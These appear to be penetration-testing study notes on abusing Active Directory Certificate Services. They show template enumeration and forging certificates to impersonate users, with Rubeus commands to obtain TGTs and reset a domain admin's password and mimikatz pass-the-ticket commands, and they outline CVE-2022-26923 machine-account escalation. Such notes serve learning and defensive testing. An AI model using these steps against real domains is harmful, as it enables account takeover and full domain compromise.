Active Directory Certificate Service ADCS

• Internal CA
• PKI
• File system encryption
• Digital signatures

• User authentication

• Certificates will not be revoked after account password reset

Certificate Templates

• Extended/Enhanced Key Usage (EKU)
• Parameter combination can be exploited
• User Certificates may be requested from a member of a Domain User Group
• Machine Certifcates may be requested from a host of a Domain Computer Group

Enumeration

• PSPKIAudit

certutil -v -template > ct.txt

Exploitable templates should have the following traits: * Allow Enroll or Allow Full Control permissions to request certificate * Find groups by net user <username> /domain --> Domain Users, Domain Computers * Client authentication EKU for Kerberos authentication --> Client Authentication * Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT

Certificate Creation

• Win+R --> mmc --> File --> Add/Remove Snap-in --> Certificates (Request Certificate if administration account --> Computer Account)
• After that in the main menu, Certificates --> right click on Personal --> All Tasks --> Request Certificates --> Next --> Next --> More information is required to enroll this certificate --> Common Name --> CN=concerto && User Principal Name is the user to impersonate --> OK --> select User Request --> Enroll
• After that in the main menu, Personal --> Certificates --> The certificate
• Right click certificate --> All Tasks --> Export --> Yes, export private key --> PFX --> set Password --> Save

Impersonation

• Request TGT with the created cert

• Grab TGT

• On the machine via

Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>

• Select a domain admin via opening Active Directory Users and Computers

.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>

• runas /user:<domain>\<username of DA> cmd.exe

• Alternatively, load the outfile of rubeus via mimikatz to authenticate as the impersonated user on a remote domain

privilege::debug
kerberos::ptt <name of file to write TGT to.kirbi>
exit
dir \\<domain>\<dir>$\

CVE-2022-26923

• Aims on abusing templates configuration, the Subject Alternative Name SAN. Set it to someone with higher permissions
• User and Machine certificate templates
• User Principal Name is used for SAN, this template can not be modified in a way to escalate privileges
• Computer accounts DNS name is used for SAN
• Users of the Authenticated Users Group can create 10 Machine Certificates
• DNS hostname is used for authentication
• Service Principal Names (SPN), associates a service logon with a service instance. SPNs are unique
• Permissions of interest, all two are needed
  • Validate write to DNS hostname allows to update DNS hostname of AD object associated with the host
  • Validate write to SPN, update SPN of the AD object associated with the host

Usage

• User account has to be compromised, use it to enrol a new host on the domain
• Alter the DNS hostname attribute of the AD Object to one of a Domain Controller or other higher privilege
• Remove the SPN attribute to bypass the unique SPN
• With the default template request the machine cert
• authenticate via Kerberos with the template as the higher privileged machine